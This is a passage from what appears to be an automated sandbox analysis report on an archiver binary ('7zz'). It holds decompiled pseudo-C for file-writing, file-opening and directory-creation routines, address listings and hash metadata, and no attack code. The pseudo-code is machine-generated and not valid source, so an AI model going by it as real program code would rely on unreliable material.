					goto L33;
				} else {
					_t169 =  *((intOrPtr*)( *_t231 + 0x14))(_t231, _t238 - 0x18);
					if(_t169 == 0) {
						__eflags =  *(_t238 - 0x18);
						 *((intOrPtr*)(_t238 - 0x10)) = 0;
						if( *(_t238 - 0x18) <= 0) {
							L9:
							__eflags =  *((intOrPtr*)(_t238 - 0x50)) - _t185;
							if( *((intOrPtr*)(_t238 - 0x50)) != _t185) {
								goto L13;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x2c))();
								goto L11;
							}
						} else {
							while(1) {
								 *(_t238 - 0x28) = _t185;
								 *(_t238 - 0x24) = _t185;
								 *(_t238 - 0x20) = _t185;
								E00401E9A(_t238 - 0x28, 3);
								_push(_t238 - 0x28);
								 *(_t238 - 4) = 1;
								_push( *((intOrPtr*)(_t238 - 0x10)));
								_t175 = L004179F7( *((intOrPtr*)(_t238 - 0x14)));
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								}
								_t175 = L004179E9(_t238 + 0x13);
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								} else {
									__eflags =  *((intOrPtr*)(_t238 + 0x13)) - _t185;
									_t180 = E00408E6D( *((intOrPtr*)(_t238 + 0x13)) - _t185, _t238 - 0x28, _t175 & 0xffffff00 |  *((intOrPtr*)(_t238 + 0x13)) == _t185);
									__eflags = _t180;
									if(_t180 != 0) {
										E00415C6D(_t238 - 0x58,  *((intOrPtr*)(_t238 - 0x10)));
									}
									 *(_t238 - 4) = _t185;
									E00407A18( *(_t238 - 0x28));
									 *((intOrPtr*)(_t238 - 0x10)) =  *((intOrPtr*)(_t238 - 0x10)) + 1;
									__eflags =  *((intOrPtr*)(_t238 - 0x10)) -  *(_t238 - 0x18);
									if( *((intOrPtr*)(_t238 - 0x10)) <  *(_t238 - 0x18)) {
										continue;
									} else {
										goto L9;
									}
								}
								goto L34;
							}
							_t236 = _t175;
							E00407A18( *(_t238 - 0x28));
							L33:
							_t117 = _t238 - 4;
							 *_t117 =  *(_t238 - 4) | 0xffffffff;
							__eflags =  *_t117;
							E00408604(_t238 - 0x58);
							_t153 = _t236;
						}
					} else {
						_t185 = _t169;
						L11:
						 *(_t238 - 4) =  *(_t238 - 4) | 0xffffffff;
						E00408604(_t238 - 0x58);
						_t153 = _t185;
					}
				}
				L34:
				 *[fs:0x0] =  *((intOrPtr*)(_t238 - 0xc));
				return _t153;
			}
























                                                                                                                                    0x00416927
                                                                                                                                    0x0041692f
                                                                                                                                    0x00416933
                                                                                                                                    0x00416936
                                                                                                                                    0x00416939
                                                                                                                                    0x0041693c
                                                                                                                                    0x0041693e
                                                                                                                                    0x00416941
                                                                                                                                    0x00416949
                                                                                                                                    0x0041694e
                                                                                                                                    0x00416955
                                                                                                                                    0x00416958
                                                                                                                                    0x0041695d
                                                                                                                                    0x00416a25
                                                                                                                                    0x00416a2a
                                                                                                                                    0x00416a2f
                                                                                                                                    0x00416a3d
                                                                                                                                    0x00416a41
                                                                                                                                    0x00416a4e
                                                                                                                                    0x00416a52
                                                                                                                                    0x00416a5d
                                                                                                                                    0x00416a64
                                                                                                                                    0x00416a71
                                                                                                                                    0x00416a75
                                                                                                                                    0x00416a7d
                                                                                                                                    0x00416a85
                                                                                                                                    0x00416a89
                                                                                                                                    0x00416a8e
                                                                                                                                    0x00416a93
                                                                                                                                    0x00416b09
                                                                                                                                    0x00416b30
                                                                                                                                    0x00416b36
                                                                                                                                    0x00416b3b
                                                                                                                                    0x00416b40
                                                                                                                                    0x00416b45
                                                                                                                                    0x00416b47
                                                                                                                                    0x00416b4a
                                                                                                                                    0x00416b68
                                                                                                                                    0x00416b6b
                                                                                                                                    0x00416b77
                                                                                                                                    0x00416b77
                                                                                                                                    0x00416b6d
                                                                                                                                    0x00416b6d
                                                                                                                                    0x00416b70
                                                                                                                                    0x00000000
                                                                                                                                    0x00416b72
                                                                                                                                    0x00416b72
                                                                                                                                    0x00416b74
                                                                                                                                    0x00416b74
                                                                                                                                    0x00416b70
                                                                                                                                    0x00416b79
                                                                                                                                    0x00416b7c
                                                                                                                                    0x00416b7e
                                                                                                                                    0x00416b80
                                                                                                                                    0x00416b81
                                                                                                                                    0x00416bde
                                                                                                                                    0x00416b83
                                                                                                                                    0x00416b8a
                                                                                                                                    0x00416b8c
                                                                                                                                    0x00416b90
                                                                                                                                    0x00416b9d
                                                                                                                                    0x00416ba1
                                                                                                                                    0x00416ba4
                                                                                                                                    0x00416ba6
                                                                                                                                    0x00416ba8
                                                                                                                                    0x00416bad
                                                                                                                                    0x00416bb6
                                                                                                                                    0x00416bb9
                                                                                                                                    0x00416bbe
                                                                                                                                    0x00416bc1
                                                                                                                                    0x00416bc3
                                                                                                                                    0x00416baf
                                                                                                                                    0x00416baf
                                                                                                                                    0x00416bb4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00416bb4
                                                                                                                                    0x00416bad
                                                                                                                                    0x00416bc9
                                                                                                                                    0x00416bcd
                                                                                                                                    0x00416bcd
                                                                                                                                    0x00416be9
                                                                                                                                    0x00416bee
                                                                                                                                    0x00416bf4
                                                                                                                                    0x00416bfb
                                                                                                                                    0x00416b4c
                                                                                                                                    0x00416b4f
                                                                                                                                    0x00416b55
                                                                                                                                    0x00416b5c
                                                                                                                                    0x00416b5f
                                                                                                                                    0x00416b5f
                                                                                                                                    0x00416a95
                                                                                                                                    0x00416a98
                                                                                                                                    0x00416a9d
                                                                                                                                    0x00416a9f
                                                                                                                                    0x00000000
                                                                                                                                    0x00416aa1
                                                                                                                                    0x00416aa7
                                                                                                                                    0x00416aa9
                                                                                                                                    0x00416aab
                                                                                                                                    0x00416aad
                                                                                                                                    0x00416aad
                                                                                                                                    0x00416aba
                                                                                                                                    0x00416ac4
                                                                                                                                    0x00416ac8
                                                                                                                                    0x00416acc
                                                                                                                                    0x00416ad5
                                                                                                                                    0x00416ad9
                                                                                                                                    0x00416ae1
                                                                                                                                    0x00416ae9
                                                                                                                                    0x00416af1
                                                                                                                                    0x00416af9
                                                                                                                                    0x00416b00
                                                                                                                                    0x00416b00
                                                                                                                                    0x00416a9f
                                                                                                                                    0x00416c02
                                                                                                                                    0x00416c0a
                                                                                                                                    0x00416c0d
                                                                                                                                    0x00000000
                                                                                                                                    0x00416963
                                                                                                                                    0x0041696a
                                                                                                                                    0x0041696f
                                                                                                                                    0x00416978
                                                                                                                                    0x0041697b
                                                                                                                                    0x0041697e
                                                                                                                                    0x004169f5
                                                                                                                                    0x004169f5
                                                                                                                                    0x004169f8
                                                                                                                                    0x00000000
                                                                                                                                    0x004169fa
                                                                                                                                    0x004169ff
                                                                                                                                    0x00000000
                                                                                                                                    0x004169ff
                                                                                                                                    0x00416980
                                                                                                                                    0x00416980
                                                                                                                                    0x00416985
                                                                                                                                    0x00416988
                                                                                                                                    0x0041698b
                                                                                                                                    0x0041698e
                                                                                                                                    0x00416999
                                                                                                                                    0x0041699a
                                                                                                                                    0x0041699e
                                                                                                                                    0x004169a1
                                                                                                                                    0x004169a6
                                                                                                                                    0x004169a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004169b3
                                                                                                                                    0x004169b8
                                                                                                                                    0x004169ba
                                                                                                                                    0x00000000
                                                                                                                                    0x004169bc
                                                                                                                                    0x004169bc
                                                                                                                                    0x004169ca
                                                                                                                                    0x004169cf
                                                                                                                                    0x004169d1
                                                                                                                                    0x004169d9
                                                                                                                                    0x004169d9
                                                                                                                                    0x004169e1
                                                                                                                                    0x004169e4
                                                                                                                                    0x004169e9
                                                                                                                                    0x004169f0
                                                                                                                                    0x004169f3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004169f3
                                                                                                                                    0x00000000
                                                                                                                                    0x004169ba
                                                                                                                                    0x00416a18
                                                                                                                                    0x00416a1a
                                                                                                                                    0x00416c12
                                                                                                                                    0x00416c12
                                                                                                                                    0x00416c12
                                                                                                                                    0x00416c12
                                                                                                                                    0x00416c19
                                                                                                                                    0x00416c1e
                                                                                                                                    0x00416c1e
                                                                                                                                    0x00416971
                                                                                                                                    0x00416971
                                                                                                                                    0x00416a02
                                                                                                                                    0x00416a02
                                                                                                                                    0x00416a09
                                                                                                                                    0x00416a0e
                                                                                                                                    0x00416a0e
                                                                                                                                    0x0041696f
                                                                                                                                    0x00416c20
                                                                                                                                    0x00416c26
                                                                                                                                    0x00416c2e

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00416927
                                                                                                                                    • GetLastError.KERNEL32(?,00000000,0048BB7C,?,00000004,00000004,?,00000000,00000000), ref: 00416AA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorH_prologLast
                                                                                                                                    • String ID: 59@$Can not create output directory
                                                                                                                                    • API String ID: 1057991267-3326608674
                                                                                                                                    • Opcode ID: f2292c707d3a767c9d5494ee6e04a15d3dfbb60e6da503046bcf5461b8d4648b
                                                                                                                                    • Instruction ID: 6de5a34db444ab3dab8a47dd72c1d742a8883a30c047269dba67d70d491f02d0
                                                                                                                                    • Opcode Fuzzy Hash: f2292c707d3a767c9d5494ee6e04a15d3dfbb60e6da503046bcf5461b8d4648b
                                                                                                                                    • Instruction Fuzzy Hash: E0A1C171D04249EFCF10EFA4C9419EEBBB4AF18308F14446EE455B7291DB38AE45CB69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00470330 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2056 470330-470347 2057 470350-470370 2056->2057 2058 470349-47034b 2056->2058 2060 470372-47037d call 4716c1 2057->2060 2061 470380-470388 2057->2061 2059 4704b6-4704ba 2058->2059 2060->2061 2063 47044f-470464 WriteFile 2061->2063 2064 47038e-47039a 2061->2064 2065 470466-47046f 2063->2065 2066 470471-47047a GetLastError 2063->2066 2068 4703a0 2064->2068 2069 47048a-470491 2064->2069 2070 470418-47041d 2065->2070 2066->2070 2073 4703a6-4703af 2068->2073 2071 470493-470499 2069->2071 2072 47049f-4704b1 call 470646 call 47064f 2069->2072 2074 4704b3 2070->2074 2075 470423-470426 2070->2075 2071->2058 2071->2072 2095 470485-470488 2072->2095 2077 4703b1-4703bc 2073->2077 2078 4703da-4703ff WriteFile 2073->2078 2074->2059 2075->2069 2083 470428-47042e 2075->2083 2079 4703c5-4703d8 2077->2079 2080 4703be-4703c4 2077->2080 2081 470444-47044d GetLastError 2078->2081 2082 470401-470409 2078->2082 2079->2073 2079->2078 2080->2079 2085 470416 2081->2085 2082->2085 2086 47040b-470414 2082->2086 2087 470430-470442 call 470646 call 47064f 2083->2087 2088 47047c-470484 call 4705d3 2083->2088 2085->2070 2086->2068 2086->2085 2087->2095 2088->2095 2095->2059
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00470330(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x496460 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E004716C1(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00470646())) = 0x1c;
								_t73 = E0047064F();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E004705D3(_a4);
						} else {
							 *((intOrPtr*)(E00470646())) = 9;
							_t73 = E0047064F();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0); // executed
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}























                                                                                                                                    0x0047033c
                                                                                                                                    0x00470341
                                                                                                                                    0x00470344
                                                                                                                                    0x00470347
                                                                                                                                    0x00470356
                                                                                                                                    0x00470368
                                                                                                                                    0x0047036b
                                                                                                                                    0x00470370
                                                                                                                                    0x00470378
                                                                                                                                    0x0047037d
                                                                                                                                    0x00470382
                                                                                                                                    0x00470384
                                                                                                                                    0x00470388
                                                                                                                                    0x0047045c
                                                                                                                                    0x00470462
                                                                                                                                    0x00470464
                                                                                                                                    0x00470477
                                                                                                                                    0x00470466
                                                                                                                                    0x00470469
                                                                                                                                    0x0047046c
                                                                                                                                    0x0047046c
                                                                                                                                    0x00470418
                                                                                                                                    0x00470418
                                                                                                                                    0x0047041b
                                                                                                                                    0x0047041d
                                                                                                                                    0x004704b3
                                                                                                                                    0x004704b3
                                                                                                                                    0x00000000
                                                                                                                                    0x004704b3
                                                                                                                                    0x00470423
                                                                                                                                    0x00470426
                                                                                                                                    0x0047048a
                                                                                                                                    0x0047048a
                                                                                                                                    0x0047048c
                                                                                                                                    0x00470491
                                                                                                                                    0x0047049f
                                                                                                                                    0x004704a4
                                                                                                                                    0x004704aa
                                                                                                                                    0x004704af
                                                                                                                                    0x00470485
                                                                                                                                    0x00000000
                                                                                                                                    0x00470485
                                                                                                                                    0x00470496
                                                                                                                                    0x00470499
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470499
                                                                                                                                    0x0047042a
                                                                                                                                    0x0047042b
                                                                                                                                    0x0047042e
                                                                                                                                    0x0047047f
                                                                                                                                    0x00470430
                                                                                                                                    0x00470435
                                                                                                                                    0x0047043b
                                                                                                                                    0x00470440
                                                                                                                                    0x00470440
                                                                                                                                    0x00000000
                                                                                                                                    0x0047042e
                                                                                                                                    0x00470391
                                                                                                                                    0x00470394
                                                                                                                                    0x00470397
                                                                                                                                    0x0047039a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004703a0
                                                                                                                                    0x004703a0
                                                                                                                                    0x004703a0
                                                                                                                                    0x004703a6
                                                                                                                                    0x004703ac
                                                                                                                                    0x004703af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004703b4
                                                                                                                                    0x004703b7
                                                                                                                                    0x004703b9
                                                                                                                                    0x004703bc
                                                                                                                                    0x004703be
                                                                                                                                    0x004703c1
                                                                                                                                    0x004703c4
                                                                                                                                    0x004703c4
                                                                                                                                    0x004703c4
                                                                                                                                    0x004703c5
                                                                                                                                    0x004703c7
                                                                                                                                    0x004703d2
                                                                                                                                    0x004703d2
                                                                                                                                    0x004703e2
                                                                                                                                    0x004703f7
                                                                                                                                    0x004703fd
                                                                                                                                    0x004703ff
                                                                                                                                    0x0047044a
                                                                                                                                    0x00000000
                                                                                                                                    0x0047044a
                                                                                                                                    0x00470401
                                                                                                                                    0x00470404
                                                                                                                                    0x00470407
                                                                                                                                    0x00470409
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470411
                                                                                                                                    0x00470411
                                                                                                                                    0x00470416
                                                                                                                                    0x00470416
                                                                                                                                    0x00000000
                                                                                                                                    0x00470416
                                                                                                                                    0x00470349
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,?), ref: 004703F7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
                                                                                                                                    • Instruction ID: f9a8e47d18844c341b85913162919efea3dfe28df8f23c4564b581e76a5f4db2
                                                                                                                                    • Opcode Fuzzy Hash: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
                                                                                                                                    • Instruction Fuzzy Hash: AE518D71901218EFCB11CF68C984ADE7BB4EF81340F10C5AAE91D9B251D738DA50CB69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040B8BF Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2098 40b8bf-40b8d8 __EH_prolog 2099 40b931-40b93a call 40b9c0 2098->2099 2100 40b8da-40b92f call 403532 AreFileApisANSI call 40822f call 40b882 call 407a18 * 2 2098->2100 2105 40b9b0-40b9bd 2099->2105 2106 40b93c-40b95b CreateFileW 2099->2106 2100->2105 2108 40b9a4-40b9ad 2106->2108 2109 40b95d-40b984 call 401e9a call 40b863 2106->2109 2108->2105 2119 40b986-40b999 CreateFileW 2109->2119 2120 40b99b-40b9a3 call 407a18 2109->2120 2119->2120 2120->2108
                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E0040B8BF(void** __ecx) {
				signed int _t37;
				void* _t38;
				signed int _t41;
				signed int _t45;
				intOrPtr* _t48;
				signed int _t50;
				void** _t74;
				void* _t76;
				intOrPtr _t81;

				L0046B890(0x473e14, _t76);
				_t81 =  *0x490a7c; // 0x1
				_t74 = __ecx;
				if(_t81 != 0) {
					_t37 = E0040B9C0(__ecx);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = CreateFileW( *(_t76 + 8),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0); // executed
						__eflags = _t38 - 0xffffffff;
						 *_t74 = _t38;
						if(_t38 == 0xffffffff) {
							 *(_t76 - 0x18) = 0;
							 *((intOrPtr*)(_t76 - 0x14)) = 0;
							 *((intOrPtr*)(_t76 - 0x10)) = 0;
							E00401E9A(_t76 - 0x18, 3);
							 *((intOrPtr*)(_t76 - 4)) = 2;
							_t41 = L0040B863(_t76 - 0x18);
							__eflags = _t41;
							if(_t41 != 0) {
								 *_t74 = CreateFileW( *(_t76 - 0x18),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0);
							}
							E00407A18( *(_t76 - 0x18));
						}
						__eflags =  *_t74 - 0xffffffff;
						_t74[1] = 0;
						_t33 =  *_t74 != 0xffffffff;
						__eflags = _t33;
						_t37 = 0 | _t33;
					}
				} else {
					L00403532(_t76 - 0x24,  *(_t76 + 8));
					 *((intOrPtr*)(_t76 - 4)) = 0;
					_t45 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t45 + 1);
					_t48 = E0040822F(_t76 - 0x30);
					 *((char*)(_t76 - 4)) = 1;
					_t50 = L0040B882(_t74, _t81,  *_t48,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14),  *(_t76 + 0x18));
					E00407A18( *((intOrPtr*)(_t76 - 0x30)));
					E00407A18( *((intOrPtr*)(_t76 - 0x24)));
					_t37 = _t50;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t37;
			}












                                                                                                                                    0x0040b8c4
                                                                                                                                    0x0040b8cf
                                                                                                                                    0x0040b8d6
                                                                                                                                    0x0040b8d8
                                                                                                                                    0x0040b933
                                                                                                                                    0x0040b938
                                                                                                                                    0x0040b93a
                                                                                                                                    0x0040b954
                                                                                                                                    0x0040b956
                                                                                                                                    0x0040b959
                                                                                                                                    0x0040b95b
                                                                                                                                    0x0040b962
                                                                                                                                    0x0040b965
                                                                                                                                    0x0040b968
                                                                                                                                    0x0040b96b
                                                                                                                                    0x0040b976
                                                                                                                                    0x0040b97d
                                                                                                                                    0x0040b982
                                                                                                                                    0x0040b984
                                                                                                                                    0x0040b999
                                                                                                                                    0x0040b999
                                                                                                                                    0x0040b99e
                                                                                                                                    0x0040b9a3
                                                                                                                                    0x0040b9a6
                                                                                                                                    0x0040b9a9
                                                                                                                                    0x0040b9ad
                                                                                                                                    0x0040b9ad
                                                                                                                                    0x0040b9ad
                                                                                                                                    0x0040b9ad
                                                                                                                                    0x0040b8da
                                                                                                                                    0x0040b8e0
                                                                                                                                    0x0040b8e5
                                                                                                                                    0x0040b8e8
                                                                                                                                    0x0040b8f0
                                                                                                                                    0x0040b8f9
                                                                                                                                    0x0040b8fa
                                                                                                                                    0x0040b906
                                                                                                                                    0x0040b914
                                                                                                                                    0x0040b91e
                                                                                                                                    0x0040b926
                                                                                                                                    0x0040b92c
                                                                                                                                    0x0040b92e
                                                                                                                                    0x0040b9b5
                                                                                                                                    0x0040b9bd

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040B8C4
                                                                                                                                    • AreFileApisANSI.KERNEL32(?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B8E8
                                                                                                                                      • Part of subcall function 0040B882: CreateFileA.KERNEL32(?,00000000,?,00000000,?,?,00000000,?,?,0040B919,?,00000001,?,?,?,00000001), ref: 0040B8A4
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,0040B46E,00000000,00000000,?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?), ref: 0040B954
                                                                                                                                    • CreateFileW.KERNEL32(?,00000003,00000000,00000000,?,?,00000000,00000003), ref: 0040B997
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Create$ApisH_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1948390111-0
                                                                                                                                    • Opcode ID: 0d9c8234506b7f62df85291397b452e72b908c256bc69bdb5d90b43c35f9900d
                                                                                                                                    • Instruction ID: 89dc2ad9e147b491d0c4ff48465b06effa766152703dd1648aaffece476b04d2
                                                                                                                                    • Opcode Fuzzy Hash: 0d9c8234506b7f62df85291397b452e72b908c256bc69bdb5d90b43c35f9900d
                                                                                                                                    • Instruction Fuzzy Hash: 91318E72900209EFCF01AFA4DD418EEBB76EF58354F10452EF551772A1C7398A64DB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00409CCB Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2125 409ccb-409ce5 __EH_prolog 2126 409d07-409d13 CreateDirectoryW 2125->2126 2127 409ce7-409d05 call 409ad5 call 409cbc call 407a18 2125->2127 2128 409d15-409d17 2126->2128 2129 409d19-409d24 GetLastError 2126->2129 2131 409d6d-409d7b 2127->2131 2128->2131 2132 409d26-409d48 call 401e9a call 40b863 2129->2132 2133 409d6b 2129->2133 2143 409d62-409d6a call 407a18 2132->2143 2144 409d4a-409d60 CreateDirectoryW call 407a18 2132->2144 2133->2131 2143->2133 2144->2131
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00409CCB(WCHAR* __ecx) {
				int _t17;
				signed int _t19;
				int _t23;
				signed int _t26;
				void* _t50;
				intOrPtr _t55;

				L0046B890(0x473a84, _t50);
				_t55 =  *0x490a7c; // 0x1
				if(_t55 != 0) {
					_t17 = CreateDirectoryW(__ecx, 0); // executed
					if(_t17 == 0) {
						if(GetLastError() == 0xb7) {
							L8:
							_t19 = 0;
						} else {
							 *(_t50 - 0x18) = 0;
							 *((intOrPtr*)(_t50 - 0x14)) = 0;
							 *((intOrPtr*)(_t50 - 0x10)) = 0;
